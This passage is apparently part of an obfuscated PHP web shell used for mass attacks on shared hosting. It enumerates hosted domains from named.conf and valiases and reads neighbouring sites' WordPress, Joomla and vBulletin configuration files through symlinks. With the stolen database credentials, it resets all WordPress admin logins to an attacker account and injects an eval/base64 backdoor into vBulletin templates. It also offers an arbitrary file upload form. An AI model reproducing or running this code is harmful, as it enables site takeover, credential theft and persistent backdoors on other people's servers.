$IIIIIIIIIll1 = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDFJ')]($GLOBALS['OOO0000O0']('bmFtZWQudHh0'));
}
if(!$IIIIIIIIIll1)
{
die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
{
echo "<div class='tmp'>
<form method='POST' action='$IIIIIIIIIlI1?sws=joomla'>
<input type='submit' value='Mass ching Admin' />
<input type='hidden' value='1' name='s' />
</form><br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
$IIIIIIIIII1l = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSTEx')]($GLOBALS['OOO0000O0']('am9vbWxhLnR4dA=='),$GLOBALS['OOO0000O0']('dw=='));
foreach($IIIIIIIIIll1 as $IIIIIIIIIl1l){
if($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUlJ')]($GLOBALS['OOO0000O0']('em9uZQ=='),$IIIIIIIIIl1l)){
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls')]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='),$IIIIIIIIIl1l,$IIIIIIIII1I1);
if(strlen($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIIII1I1[1][0])) >2){
$IIIIIIIII1ll = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWwx')](@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMTFJ')]($GLOBALS['OOO0000O0']('L2V0Yy92YWxpYXNlcy8=').$IIIIIIIII1I1[1][0]));
$IIIIIIIII11l=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhw');
$IIIIIIIII111=get_headers($IIIIIIIII11l);
$wp=$IIIIIIIII111[0];
$IIIIIIIIlIIl=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHA=');
$IIIIIIIIlII1=get_headers($IIIIIIIIlIIl);
$IIIIIIIIlIlI=$IIIIIIIIlII1[0];
$IIIIIIIlI111=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL2pvb21sYS9jb25maWd1cmF0aW9uLnBocA==');
$IIIIIIIllIII=get_headers($IIIIIIIlI111);
$IIIIIIIllIIl=$IIIIIIIllIII[0];
$IIIIIIII1I1I = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($wp,$GLOBALS['OOO0000O0']('MjAw'));
$IIIIIIII1I11=$GLOBALS['OOO0000O0']('Jm5ic3A7');
if ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($wp,$GLOBALS['OOO0000O0']('MjAw')) == true )
{
$IIIIIIII1I11= $IIIIIIIII11l;
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIIlIlI,$GLOBALS['OOO0000O0']('MjAw')) == true)
{
$IIIIIIII1I11= $IIIIIIIIlIIl;
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIllIIl,$GLOBALS['OOO0000O0']('MjAw')) == true)
{
$IIIIIIII1I11= $IIIIIIIlI111;
}
else
{
continue;
}
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$IIIIIIIIIl1l = $IIIIIIIII1I1[1][0];
$w = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbElJ')]($IIIIIIIIII1l,"$IIIIIIII1I11||$IIIIIIIIIl1l \n");
if($w){$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOiAjMDA2NjAwIj5TYXZlPC9iPg==');}else{$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOnJlZCI+ZmFpbGVkPC9iPg==');}
echo $GLOBALS['OOO0000O0']('PHRyPjx0ZD48YSBocmVmPWh0dHA6Ly93d3cu').$IIIIIIIII1I1[1][0].$GLOBALS['OOO0000O0']('Pg==').$IIIIIIIII1I1[1][0]."</a></td>
<td><a href='$IIIIIIII1I11'>config</a></td><td>".$r.$GLOBALS['OOO0000O0']('PC90ZD48L3RyPg==');
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
}
}
}
}
break;
case $GLOBALS['OOO0000O0']('d3A='):
if(isset($_POST[$GLOBALS['OOO0000O0']('cw==')])){
$file = @file_get_contents($GLOBALS['OOO0000O0']('d3AudHh0'));
$IIIIIIIlII11   = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSWxJ')]("\n",$file);
echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
foreach ($IIIIIIIlII11 as $IIIIIIIlIlII){
$IIIIIIIlIlIl   = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSWxJ')]($GLOBALS['OOO0000O0']('fHw='),$IIIIIIIlIlII);
$IIIIIIII1I11 = $IIIIIIIlIlIl[0];
$IIIIIIIlIlI1 = $IIIIIIIlIlIl[1];
$IIIIIIIlIllI = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIIlIlI1).$GLOBALS['OOO0000O0']('');
$IIIIIIIlIlll  = @file_get_contents($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIII1I11));
if($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJbGwx')]($GLOBALS['OOO0000O0']('d3Atc2V0dGluZ3MucGhw'),$IIIIIIIlIlll)){
$IIIIIIIlIl1I    =  IIIIIIIllll1($IIIIIIIlIlll,"define('DB_PASSWORD', '","');");
$IIIIIIIlIl1l  =  IIIIIIIllll1($IIIIIIIlIlll,"define('DB_USER', '","');");
$IIIIIIIlIl11      =  IIIIIIIllll1($IIIIIIIlIlll,"define('DB_NAME', '","');");
$IIIIIIIlI1II     =  IIIIIIIllll1($IIIIIIIlIlll,$GLOBALS['OOO0000O0']('JHRhYmxlX3ByZWZpeCAgPSAn'),"';");
$IIIIIIIlI1Il     = $IIIIIIIlI1II.$GLOBALS['OOO0000O0']('dXNlcnM=');
$IIIIIIIlI1I1     = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJMWxJ')]($GLOBALS['OOO0000O0']('bG9jYWxob3N0'),$IIIIIIIlIl1l,$IIIIIIIlIl1I);
$IIIIIIIlIl11      = @mysql_select_db($IIIIIIIlIl11,$IIIIIIIlI1I1);
$IIIIIIIlI1ll   = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJMWwx')]("UPDATE `$IIIIIIIlI1Il` SET `user_login` ='sec-w.com'") or die;
$IIIIIIIlI1ll   = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJMWwx')]("UPDATE `$IIIIIIIlI1Il` SET `user_pass` ='$IIIIIIIllII1$IIIIIIIllIlI/.5i..$IIIIIIIllIll.fUHEmNZ.eIKYTwx/'") or die;
if ($IIIIIIIlI1ll){$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOiAjMDA2NjAwIj5TdWNjZWVkIDwvYj51c2VyIFtzZWMtdy5jb21dIHBhc3?MgWzFdPC9iPg==');}
else
{
$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOnJlZCI+ZmFpbGVkPC9iPg==');
}
$IIIIIIIlIllI = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIIlIlI1).$GLOBALS['OOO0000O0']('');
echo "<tr>
<td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
<td><a target='_blank' href='$IIIIIIII1I11'>config</a></td><td>".$r.$GLOBALS['OOO0000O0']('PC90ZD48L3RyPg==');
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
}else{
echo "<tr>
<td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
<td><a target='_blank' href='http://$IIIIIIII1I11'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
}
}
die();
}
if(!$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbGxs')]($GLOBALS['OOO0000O0']('bmFtZWQudHh0'))){
$IIIIIIIIIll1 = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDFJ')]($GLOBALS['OOO0000O0']('L2V0Yy9uYW1lZC5jb25m'));
}else{
$IIIIIIIIIll1 = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDFJ')]($GLOBALS['OOO0000O0']('bmFtZWQudHh0'));
}
if(!$IIIIIIIIIll1)
{
die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
{
echo "<div class='tmp'>
<form method='POST' action='$IIIIIIIIIlI1?sws=wp'>
<input type='submit' value='Mass Change Admin' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$IIIIIIIIII1l = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSTEx')]($GLOBALS['OOO0000O0']('d3AudHh0'),$GLOBALS['OOO0000O0']('dw=='));
foreach($IIIIIIIIIll1 as $IIIIIIIIIl1l){
if($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUlJ')]($GLOBALS['OOO0000O0']('em9uZQ=='),$IIIIIIIIIl1l)){
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls')]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='),$IIIIIIIIIl1l,$IIIIIIIII1I1);
if(strlen($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIIII1I1[1][0])) >2){
$IIIIIIIII1ll = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWwx')](@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMTFJ')]($GLOBALS['OOO0000O0']('L2V0Yy92YWxpYXNlcy8=').$IIIIIIIII1I1[1][0]));
$IIIIIIIII11l=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHA=');
$IIIIIIIII111=get_headers($IIIIIIIII11l);
$wp=$IIIIIIIII111[0];
$IIIIIIIIlIIl=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocA==');
$IIIIIIIIlII1=get_headers($IIIIIIIIlIIl);
$IIIIIIIIlIlI=$IIIIIIIIlII1[0];
$IIIIIIIlI111=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3B1YmxpY19odG1sL3dwL3dwLWNvbmZpZw==');
$IIIIIIIllIII=get_headers($IIIIIIIlI111);
$IIIIIIIllIIl=$IIIIIIIllIII[0];
$IIIIIIII1I1I = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($wp,$GLOBALS['OOO0000O0']('MjAw'));
$IIIIIIII1I11=$GLOBALS['OOO0000O0']('Jm5ic3A7');
if ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($wp,$GLOBALS['OOO0000O0']('MjAw')) == true )
{
$IIIIIIII1I11= $IIIIIIIII11l;
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIIlIlI,$GLOBALS['OOO0000O0']('MjAw')) == true)
{
$IIIIIIII1I11= $IIIIIIIIlIIl;
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIllIIl,$GLOBALS['OOO0000O0']('MjAw')) == true)
{
$IIIIIIII1I11= $IIIIIIIlI111;
}
else
{
continue;
}
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$IIIIIIIIIl1l = $IIIIIIIII1I1[1][0];
$w = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbElJ')]($IIIIIIIIII1l,"$IIIIIIII1I11||$IIIIIIIIIl1l \n");
if($w){$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOiAjMDA2NjAwIj5TYXZlPC9iPg==');}else{$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOnJlZCI+ZmFpbGVkPC9iPg==');}
echo $GLOBALS['OOO0000O0']('PHRyPjx0ZD48YSBocmVmPWh0dHA6Ly93d3cu').$IIIIIIIII1I1[1][0].$GLOBALS['OOO0000O0']('Pg==').$IIIIIIIII1I1[1][0]."</a></td>
<td><a href='$IIIIIIII1I11'>config</a></td><td>".$r.$GLOBALS['OOO0000O0']('PC90ZD48L3RyPg==');
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
}
}
}
}
break;
case $GLOBALS['OOO0000O0']('dmI='):
if(isset($_POST[$GLOBALS['OOO0000O0']('cw==')])){
$file = @file_get_contents($GLOBALS['OOO0000O0']('dmIudHh0'));
$IIIIIIIlII11   = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSWxJ')]("\n",$file);
echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
foreach ($IIIIIIIlII11 as $IIIIIIIlIlII){
$IIIIIIIlIlIl   = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSWxJ')]($GLOBALS['OOO0000O0']('fHw='),$IIIIIIIlIlII);
$IIIIIIII1I11 = $IIIIIIIlIlIl[0];
$IIIIIIIlIlI1 = $IIIIIIIlIlIl[1];
$IIIIIIIlIllI = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIIlIlI1).$GLOBALS['OOO0000O0']('');
$IIIIIIIlIlll  = @file_get_contents($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIII1I11));
if($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJbGwx')]($GLOBALS['OOO0000O0']('dkJ1bGxldGlu'),$IIIIIIIlIlll)){
$IIIIIIIlIl11      =  IIIIIIIllll1($IIIIIIIlIlll,$GLOBALS['OOO0000O0']('JGNvbmZpZ1snRGF0YWJhc2UnXVsnZGJuYW1lJ10gPSAn'),"';");
$IIIIIIIlIl1l  =  IIIIIIIllll1($IIIIIIIlIlll,$GLOBALS['OOO0000O0']('JGNvbmZpZ1snTWFzdGVyU2VydmVyJ11bJ3VzZXJuYW1lJ10gPSAn'),"';");
$IIIIIIIlIl1I    =  IIIIIIIllll1($IIIIIIIlIlll,$GLOBALS['OOO0000O0']('JGNvbmZpZ1snTWFzdGVyU2VydmVyJ11bJ3Bhc3N3b3JkJ10gPSAn'),"';");
$IIIIIIIlI1I1     = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJMWxJ')]($GLOBALS['OOO0000O0']('bG9jYWxob3N0'),$IIIIIIIlIl1l,$IIIIIIIlIl1I);
$IIIIIIIlIl11      = @mysql_select_db($IIIIIIIlIl11,$IIIIIIIlI1I1);
$IIIIIIIllIl1   = $GLOBALS['OOO0000O0']('YlZEUFM4TXdGTDRML2crdllaQVdkUFBpYVV2MTRrQVFGS3FuVVVxYXBqU1lOS0ZKeENuNzMyMmFiZ3?pjSWZEeXZsK1A3L3FLczA0RDN0UzVzSjk2TU1KOWIrb2hEdzh2VFdjcTMxUEYwMnlKcC9XcXp2RWFaaz?JyQndXVU9hRjdnaEFvN2pyZEVHUzBkUWg0ejl6ZWNJS1VsMDRZT3JoVjROODIxRkVFd1pRZ2I2U21EUj?hRaU9ic2R4WWhldU1kUktOV1NINVV4dG1LbjNHK3YwUDVUSXhnTlRxaFdXUjlyWVNMQVhIL1JhVWZnWT?hwYlZST1o0VkkwYWF3cU41ZWkvY2REbFJjQWlGd0pFSUd2NEh5eUxUWnA0dHErL3p5Vk94d09BU1hPK3?lVcVVJNkxtL2dIeGlCTERpYzZvNjJVSGpHdUxXUUpFa285OVQ5R2c3QXBlVVhKRnNxNUVYK0FSN3lQdz?09') ;
$IIIIIIIllI1I  = "{\${eval(gzinflate(base64_decode(\'";
$IIIIIIIllI1I .= "$IIIIIIIllIl1";
$IIIIIIIllI1I .= "\')))}}{\${exit()}}</textarea>";
$IIIIIIIllI1l = "UPDATE template SET template ='".$IIIIIIIllI1I."' WHERE title ='FAQ'";
$IIIIIIIlI1ll  = @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxJMWwx')]($IIIIIIIllI1l,$IIIIIIIlI1I1);
if ($IIIIIIIlI1ll){$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOiAjMDA2NjAwIj5TdWNjZWVkPC9iPiBzaGVsbCBpbiBzZWFyY2gucGhw')?;}
else
{
$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOnJlZCI+ZmFpbGVkPC9iPg==');
}
$IIIIIIIlIllI = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIIlIlI1).$GLOBALS['OOO0000O0']('');
echo "<tr>
<td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
<td><a target='_blank' href='$IIIIIIII1I11'>config</a></td><td>".$r.$GLOBALS['OOO0000O0']('PC90ZD48L3RyPg==');
}else{
echo "<tr>
<td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
<td><a target='_blank' href='http://$IIIIIIII1I11'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
}
}
die();
}
if(!$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbGxs')]($GLOBALS['OOO0000O0']('bmFtZWQudHh0'))){
$IIIIIIIIIll1 = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDFJ')]($GLOBALS['OOO0000O0']('L2V0Yy9uYW1lZC5jb25m'));
}else{
$IIIIIIIIIll1 = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDFJ')]($GLOBALS['OOO0000O0']('bmFtZWQudHh0'));
}
if(!$IIIIIIIIIll1)
{
die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
{
echo "<div class='tmp'>
<form method='POST' action='$IIIIIIIIIlI1?sws=vb'>
<input type='submit' value='Inject shell' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
$IIIIIIIIII1l = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJSTEx')]($GLOBALS['OOO0000O0']('dmIudHh0'),$GLOBALS['OOO0000O0']('dw=='));
foreach($IIIIIIIIIll1 as $IIIIIIIIIl1l){
if($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUlJ')]($GLOBALS['OOO0000O0']('em9uZQ=='),$IIIIIIIIIl1l)){
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls')]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='),$IIIIIIIIIl1l,$IIIIIIIII1I1);
if(strlen($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWxJ')]($IIIIIIIII1I1[1][0])) >2){
$IIIIIIIII1ll = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMWwx')](@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMTFJ')]($GLOBALS['OOO0000O0']('L2V0Yy92YWxpYXNlcy8=').$IIIIIIIII1I1[1][0]));
$IIIIIIIII11l=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L2luY2x1ZGVzL2NvbmZpZy5waHA=');
$IIIIIIIII111=get_headers($IIIIIIIII11l);
$wp=$IIIIIIIII111[0];
$IIIIIIIIlIIl=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L3ZiL2luY2x1ZGVzL2NvbmZpZy5waHA=');
$IIIIIIIIlII1=get_headers($IIIIIIIIlIIl);
$IIIIIIIIlIlI=$IIIIIIIIlII1[0];
$IIIIIIIlI111=$IIIIIIIIIIIl.$GLOBALS['OOO0000O0']('L3N5bS9yb290L2hvbWUv').$IIIIIIIII1ll[$GLOBALS['OOO0000O0']('bmFtZQ==')].$GLOBALS['OOO0000O0']('L2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHA=');
$IIIIIIIllIII=get_headers($IIIIIIIlI111);
$IIIIIIIllIIl=$IIIIIIIllIII[0];
$IIIIIIII1I1I = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($wp,$GLOBALS['OOO0000O0']('MjAw'));
$IIIIIIII1I11=$GLOBALS['OOO0000O0']('Jm5ic3A7');
if ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($wp,$GLOBALS['OOO0000O0']('MjAw')) == true )
{
$IIIIIIII1I11= $IIIIIIIII11l;
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIIlIlI,$GLOBALS['OOO0000O0']('MjAw')) == true)
{
$IIIIIIII1I11= $IIIIIIIIlIIl;
}
elseif ($GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxSTFs')]($IIIIIIIllIIl,$GLOBALS['OOO0000O0']('MjAw')) == true)
{
$IIIIIIII1I11= $IIIIIIIlI111;
}
else
{
continue;
}
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
$IIIIIIIIIl1l = $IIIIIIIII1I1[1][0];
$w = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbElJ')]($IIIIIIIIII1l,"$IIIIIIII1I11||$IIIIIIIIIl1l \n");
if($w){$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOiAjMDA2NjAwIj5TYXZlPC9iPg==');}else{$r = $GLOBALS['OOO0000O0']('PGIgc3R5bGU9ImNvbG9yOnJlZCI+ZmFpbGVkPC9iPg==');}
echo $GLOBALS['OOO0000O0']('PHRyPjx0ZD48YSBocmVmPWh0dHA6Ly93d3cu').$IIIIIIIII1I1[1][0].$GLOBALS['OOO0000O0']('Pg==').$IIIIIIIII1I1[1][0]."</a></td>
<td><a href='$IIIIIIII1I11'>config</a></td><td>".$r.$GLOBALS['OOO0000O0']('PC90ZD48L3RyPg==');
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJbDEx')]();
}
}
}
}
break;
case $GLOBALS['OOO0000O0']('aGVscA=='):
echo "<div class='tmp'>
<table align='center' width='40%'><td>function</td><td>Case</td>";
$safe_mode = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxsbElJ')]($GLOBALS['OOO0000O0']('c2FmZV9tb2Rl'));
if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>Safe Mode</td><td>$r</td>";
$IIIIIIIlllIl = function_exists($GLOBALS['OOO0000O0']('c3ltbGluaw=='));
if(!$IIIIIIIlllIl){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function symlink</td><td>$r</td>";
$IIIIIIIlllIl = function_exists($GLOBALS['OOO0000O0']('ZmlsZQ=='));
if(!$IIIIIIIlllIl){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function file</td><td>$r</td>";
$IIIIIIIlllIl = function_exists($GLOBALS['OOO0000O0']('ZmlsZV9nZXRfY29udGVudHM='));
if(!$IIIIIIIlllIl){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function file_get_contents</td><td>$r</td>";
$IIIIIIIlllIl = function_exists($GLOBALS['OOO0000O0']('bWtkaXI='));
if(!$IIIIIIIlllIl){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>function mkdir</td><td>$r</td>";
$IIIIIIIlllIl = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxsbEkx')]($GLOBALS['OOO0000O0']('c3ltL3Jvb3Q='));
if(!$IIIIIIIlllIl){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
echo "<tr><td>Permission denied</td><td>$r</td>";
$IIIIIIIlllIl = $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUkxbGxJ')]($GLOBALS['OOO0000O0']('L0ZvcmJpZGRlbi8='),@file_get_contents($GLOBALS['OOO0000O0']('c3ltL3Jvb3Q=')) or !@file_get_contents($GLOBALS['OOO0000O0']('c3ltL3Jvb3Q=')));
if($IIIIIIIlllIl){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
echo "<tr><td>Forbidden</td><td>$r</td>";
echo $GLOBALS['OOO0000O0']('PC90YWJsZT48L2Rpdj4=');
break;
default:
$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxsbGxJ')]("Location: $IIIIIIIIIlI1");
}
}else
{
echo $GLOBALS['OOO0000O0']('PGJyIC8+PGJyIC8+PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYX?J0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+');
echo $GLOBALS['OOO0000O0']('PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHZhbHVlPSJDaG9vc2UgZmlsZSIgc2l6ZT0iNj?AiID48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZC?I+PC9mb3JtPg==');
if( $_POST[$GLOBALS['OOO0000O0']('X3VwbA==')] == $GLOBALS['OOO0000O0']('VXBsb2Fk') ) {
if(@$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSWxsbGxs')]($_FILES[$GLOBALS['OOO0000O0']('ZmlsZQ==')][$GLOBALS['OOO0000O0']('dG1wX25hbWU=')],$_FILES[$GLOBALS['OOO0000O0']('ZmlsZQ==')][$GLOBALS['OOO0000O0']('bmFtZQ==')])) {echo $GLOBALS['OOO0000O0']('PGJyIC8+PGJyIC8+PGI+VXBsb2FkZWQgc3VjY2Vzc2Z1bCAhITxicj48YnI+');}
else {echo $GLOBALS['OOO0000O0']('PGJyIC8+PGJyIC8+Tm90IHVwbG9hZGVkICEhPGJyPjxicj4=');}
}
echo $GLOBALS['OOO0000O0']('DQo8YnIgLz48YnIgLz48YnIgLz48L2I+PC9iPjxkaXYgY2xhc3M9ImZvdCI+Q29kM2QgYnkgPGI+Uz?NuNHQwMHI8L2I+IElkZWEgYnkgPGI+TXIuQWxzYTNlazwvYj4NCjxiciAvPjxiciAvPg0KPGIgc3R5bG?U9ImNvbG9yOiByZWQiOz4gICBTZWMtdy5Db20gIDwvYj4NCjxiciAvPjxiciAvPg0KTXVzbGltcyBIYW?NrZXJzPC9kaXY+IA==');
}
